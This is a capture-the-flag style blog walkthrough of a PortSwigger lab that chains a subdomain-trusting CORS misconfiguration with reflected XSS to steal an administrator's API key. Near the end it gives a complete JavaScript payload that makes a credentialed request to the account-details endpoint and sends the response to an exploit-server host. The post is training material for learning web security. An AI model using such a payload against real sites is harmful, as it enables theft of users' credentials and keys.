Welcome back to the biweekly Methodology Walkthrough, let’s see exactly how a CORS misconfiguration can affect your web application.
Objective
Craft a Javascript payload that uses CORS to retrieve the administrator’s API Key.
What is CORS?
Cross-Origin Resource Sharing (CORS) is a security feature implemented by web browsers that allows web applications to request resources from different domains than their own. It is designed to prevent malicious websites from accessing sensitive data on other sites. When it’s not configured correctly, it can inadvertently expose vulnerabilities.
Methodology
The Recon
We start this lab with very limited information.
We can see that there is a shop very similar to shops we’ve seen in previous Methodology Walkthroughs.
Digging into the a product, we can see that there is a stock check feature.
It’s again, something we’ve seen before, but this time it has very different behavior.
Instead of embedding the results of the stock check in the DOM of the applicaiton, it opens an entirely new window with the results in it.
This is odd… let’s make not of this and come back to it.
We can see next that we have the ability to login to an account with the default credentials provided, and inside the account is an API Key.
We can assume that the API Key for the administrator will also be retrieved in a similar way - let’s also make note of this here.
The last piece that we can see we have available to us is the Exploit server. We’ll be using this to deliver our attack.
Now that we’ve taken a look through our entire application, let’s reference the SiteMap for any glaringly obvious vulnerabilities.
We can see that there is an error on the product page that there is an absence of an anti-CSRF token - another thing to make note of.
Lastly, let’s take a look in our HTTP History, specifically the AccountDetails page where our API Key was.
In the History, we can see the details of an account our retrieved via an AJAX request, and the response has an Access-Control-Allow-Credentials header present.
This suggests there may be CORS support.
This looks like all we’ll need for the Recon. We can begin poking around further.
Testing
Start by sending the AccountDetails Request over to the repeater. Add the following header in:
Origin: http://subdomain.lab-id
The lab-id will need ot be consistent with the current lab instance of yours.
You’ll notice there is reflection in the response.
When testing, reflection is always a good sign and can generally be an avenue into an attack.
Try both http:// and https://. You’ll see that both work.
This confirms the CORS configuration allows access from an arbitrary subdomain.
Exploitation
Let’s revisit the suspicious stock check feature.
We can see it is loaded using an HTTP request against a subdomain:
If we send this to the repeater, we can see in the reflected response that this request is vulnerable to XSS:
Let’s head over to our exploit server and enter the following Payload:
<script> document.location="http://stock.LAB-ID.web-security-academy.net/?productId=<script>var xhr = new XMLHttpRequest();var url = 'https://LAB-ID.web-security-academy.net';xhr.onreadystatechange = function(){if (xhr.readyState == XMLHttpRequest.DONE) {fetch('https://exploit-ID.exploit-server.net?key=' %2b xhr.responseText)};};xhr.open('GET', url %2b '/accountDetails', true); xhr.withCredentials = true;xhr.send(null);%3c/script>&storeId=1" </script>
Make sure to enter your own lab information.
This payload will exploit the XSS vulnerability and log the API Key in our Exploit Server.
Click Store and Deliver exploit to Victim.
If we go to the Access Log, we should see the Administrator request buried inside the logs with the API Key in the Response.
Grab the Key and submit it to solve the lab!
What We’ve Learned
We explored just how a CORS misconfiguration can be leveraged to extract sensitive information. By verifying a potential CORS vuln and crafting a malicious JavaScript payload exploiting the identified XSS vuln we were able to capture the API Key. This shows the importance of correctly configuring CORS in order to prevent unauthorized Cross-Origin Requests to protect your web applications.
Want to give the lab a try yourself? You can check it out on PortSwigger’s website here.
Securely Yours,
The Cybersec Cafe
Just a heads up, The Cybersec Cafe's got a pretty cool weekly cadence.
Every week, expect to dive into the hacker’s mindset in our Methodology Walkthroughs or explore Deep Dive articles on various cybersecurity topics.
. . .
Oh, and if you want even more content and updates, hop over to Ryan G. Cox on Twitter/X or my Website. Can't wait to keep sharing and learning together!